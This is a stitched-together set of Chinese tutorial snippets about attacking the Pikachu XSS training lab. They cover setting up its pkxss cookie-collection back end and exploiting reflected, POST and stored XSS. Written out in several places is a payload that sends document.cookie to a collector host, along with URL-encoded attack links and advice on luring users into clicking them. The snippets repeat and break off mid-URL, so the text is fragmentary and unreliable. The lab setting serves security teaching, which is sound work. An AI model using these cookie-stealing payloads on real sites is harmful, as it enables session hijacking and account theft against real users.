在反射型xss(get)页面下使用 document.location = 'http://192.168.50.100/pkxss/xcookie/cookie.php?cookie=' + document.cookie; 点提交,会跳转到首页, http://192.168.50.100/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3E+document.location+%3D+%27http%3A%2F%2F192.168.50.100%2Fpkxs...
将Pikachu靶场复制到htdocs目录下,并开启MySQL。这里使用的是phpStudy环境,由于Apache已经另外安装并开启了,因此这里只需要单独启动MySQL即可 5 payload 放到反射型XSS(get)测试 这里没有弹窗问题了,但是后台始终没有获取到数据,经过一番代码调试最终解决了问题 6 修改 fish.php 代码 7 重试,后台成功获取结果 XSS 利用...
说明:pikachu的后台模块是一个独立的模块,可以把在pikachu的站点目录C:\phpStudy\PHPTutorial\WWW\pikachu-master(不是确定的目录,视自己的情况而定)中,将pkxss文件夹复制到站点目录(C:\phpStudy\PHPTutorial\WWW)下。如下图所示。 接下来我们有两种方式来访问pkxss后台。 第一种: 第二种:当我们按照说明中说的...
pikachuXSS后台的使用和安装 pikachuXSS后台的使⽤和安装 xss后台的安装 重定向到另⼀个可信⽹址让点击者不知情 1.cookie值获取 查看源代码 在反射型xss(get)页⾯下使⽤ document.location = 'http://192.168.50.100/pkxss/xcookie/cookie.php?cookie=' + document.cookie; ...
首先修改xss后台下的pkxss/xcookie/cookie.php文件,将IP地址改为漏洞服务器的地址: 诱使用户点击攻击网址:http://127.0.0.1/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2F127.0.0.1%2Fpikachu%2fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+docu...
配置成功之后访问后台: 登陆成功之后,界面有三个模块,我们选择cookie 这里是存放受害人cookie的地方: 首先修改xss后台下的pkxss/xcookie/cookie.php文件,将IP地址改为漏洞服务器的地址: 诱使用户点击攻击网址: http://127.0.0.1/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location...
查看后台代码,发现 后台代码并没有对你输入的东西 做任何修改 ,只是原封不动的输出了2.反射型xss(post) 输入账号密码:admin/123456 登入成功登陆后的界面登入后直接输入payload:alert(/xss/) 触发弹窗3.存储型xss 输入特殊字符:'"<> 发现没有过滤查看前端元素代码直接...
alert(/xss/) 即可 提交后,发现触发了xss 查看后台代码,发现 后台代码并没有对你输入的东西 做任何修改 ,只是原封不动的输出了 3.反射型xss(post) 输入账号密码:admin/123456 登入 成功登陆后的界面 登入后直接输入payload: alert(/xss/) 触发弹窗 4.存储型xss 输入特殊字符:'...
先用xss语句在留言板提交,留言列表中并没有显示我们的代码,但是检查元素中可以看到xss语句插入到代码中 alert('xss') 1. 在这之后每提交一次留言板都会出现弹框 DOM型xss 输入内容点击click me 生成了超链接 点击what do you see跳转 这里要用onclick参数...
首先需要搭建一个收集Cookie的后台。这里Pikachu已经为我们准备好了,只需要在左侧管理工具栏进入XSS后台,点击初始化 修改IP地址。打开Pikachu/pkxss/xcookie/post.html文件,因为这里是在本地演示,因此2个IP都修改为127.0.0.1,通过目录来区分漏洞网站和黑客后台。如果是在多台虚拟机中进行实验,即将第1处修改为漏洞网站...